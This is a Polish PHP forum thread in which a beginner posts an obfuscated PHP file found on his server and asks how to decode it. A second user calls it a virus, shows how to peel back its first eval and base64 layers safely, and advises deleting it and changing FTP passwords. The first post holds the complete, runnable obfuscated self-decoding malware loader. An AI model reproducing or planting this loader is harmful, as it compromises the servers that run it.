Forum PHP.pl > Zakodowany plik php? Jak go odkodować?

Pomoc - Szukaj - Użytkownicy - Kalendarz

Pełna wersja: Zakodowany plik php? Jak go odkodować?

wolf3092

16.03.2013, 20:03:15

Witam. Poniżej mam kod php, który został zakodowany? Pewien tego nie jestem, chciałbym się dowiedzieć czy można go jakoś odkodować? Jest to w ogóle możliwe? Jeśli tak to jak? Bo jeśli na serwer go wrzuce to wykonuje się normalnie.

[PHP] pobierz, plaintext 
<?php $OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$OOO000O00=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};$O0O000O00=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};$O0O000O0O=$O0O000O00.$OOO000000{11};$O0O000O00=$O0O000O00.$OOO000000{3};$O0O00OO00=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$OOO00000O=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};$OOO0O0O00=__FILE__;$OO00O0000=0x1460;eval($OOO0000O0('JE8wMDBPME8wMD0kT09PMDAwTzAwKCRPT08wTzBPMDAsJ3JiJyk7JE8wTzAwT08wMCgkTzAwME8wTzAw
LDB4NGI3KTskT08wME8wME8wPSRPT08wMDAwTzAoJE9PTzAwMDAwTygkTzBPMDBPTzAwKCRPMDAwTzBPM
DAsMHgxN2MpLCdSN24zUUxCODZHVnlxNTJidHhQWUF3Q2FUNGVXVUZycGZ1RWNYdk5sZ0RkSGhJaUpqS2
tNbU9vU3NaejAxOSsvPScsJ0FCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHF
yc3R1dnd4eXowMTIzNDU2Nzg5Ky8nKSk7ZXZhbCgkT08wME8wME8wKTs='));return;?>NM|ZnZGc\uKYmmgx{vGQ9bq37bq37bq3OMF8GpUNwjWBLc4PflaO9BPAKLaO1lyn6l6EsXYm9bqQ1jY
MRjyE6l6EjXYm9bq3RjqQ1jVnxbYm1jq3RjqQ1gGQ1jYMRjYm1jqnfXYMRjqQ1jYMRjynxbYMRjYMRjq3
RDynFP5osMAAKn2348wlvK5YGEF8utCALStoLA5BwawA4kUB4OxC5TFXZh4mxXPBuGeADdPoI5WA9JAS5
ercRK2PhJbPUhGmLntmxLxXF6PADyYQO2YO7xAv5Aww4aCLveTCGc4BwN4ouDeNIhWCZJU8LkUSxOFlFs
ragjqY6M53Ao5MfZVk1lVPXD2o4cWB9M4PfXYMRjqQ1jYMRjVYIvFNLhVnxbYMRjYMRjYMRD2j==nNvN6
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
BGhWo5Hao4DWBwM6nX0nlmV2j==xpE
[PHP] pobierz, plaintext

sazian

16.03.2013, 21:01:20

po pierwsze to jest "wirus" i dzięki za kolejnego do mojej kolekcji

a wracając do tematu
można to rozkodować ale to bardzo żmudna robota
np.
wykonując ten kod

[PHP] pobierz, plaintext 
$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$OOO0000O0=$OOO000000{4}.$OOO000000{9.......
[PHP] pobierz, plaintext

dowiadujesz się że do zmiennej $OOO0000O0 zostaje przypisana funkcja base64_decode

dalej rozkodowując to

[PHP] pobierz, plaintext 
$OOO0000O0('JE8wMDBPME8wMD0kT09PMDAwTzAwKCRPT08wTzBPMDAsJ3JiJ....
[PHP] pobierz, plaintext

dostajesz całą masę innego zakodowanego kodu

czyli po prostu wywal to
przeszukaj cały serwer
zmień hasło do ftp
nie zapisuj hasła do ftp w kliencie

wolf3092

16.03.2013, 21:16:21

No dobra, ale jak to krok po kroku odkodować? Co trzeba zrobić? Przygode z php dopiero zaczynam.

sazian

16.03.2013, 21:27:15

np. wykonujesz ten fragment

[PHP] pobierz, plaintext 
$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000.....
[PHP] pobierz, plaintext

i dajesz na końcu echo $OOO0000O0; z tego dowiadujesz się że zostaje tam przypisana funkcja base64_decode

dalej masz

[PHP] pobierz, plaintext 
eval($OOO0000O0('JE8wMDBPME8wMD0kT09PMDAwTzAwKCRPT08wTzBPMDAsJ3JiJyk7JE8wT...
[PHP] pobierz, plaintext

eval pomijasz żeby tego nie wykonywać, oraz już wiesz że pod $OOO0000O0 jest base64_decode więc piszesz

[PHP] pobierz, plaintext 
echo base64_decode('JE8wMDBPME8wMD0kT09PMDAwTzAwKCRPT08wTzBPMDAsJ3JiJyk7JE8wT...
[PHP] pobierz, plaintext

wykonujesz i już wiesz że tam jest napisane

[PHP] pobierz, plaintext 
$O000O0O00=$OOO000O00($OOO0O0O00,'rb');$O0O00OO00($O000O0O00,0x4b7);$OO00O00O0=$OOO0000O0($OOO00000O($O0O00OO00($O000O0O00,0x17c),'R7n3QLB86GVyq52btxPYAwCaT4eWUFrpfuEcXvNlgDdHhIiJjKkMmOoSsZz019+/=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'));eval($OO00O00O0);
[PHP] pobierz, plaintext

i tak dalej aż dojdziesz do normalnego kodu

też kiedyś próbowałem coś takiego rozszyfrować ale po jakichś 2h miałem dosyć

To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.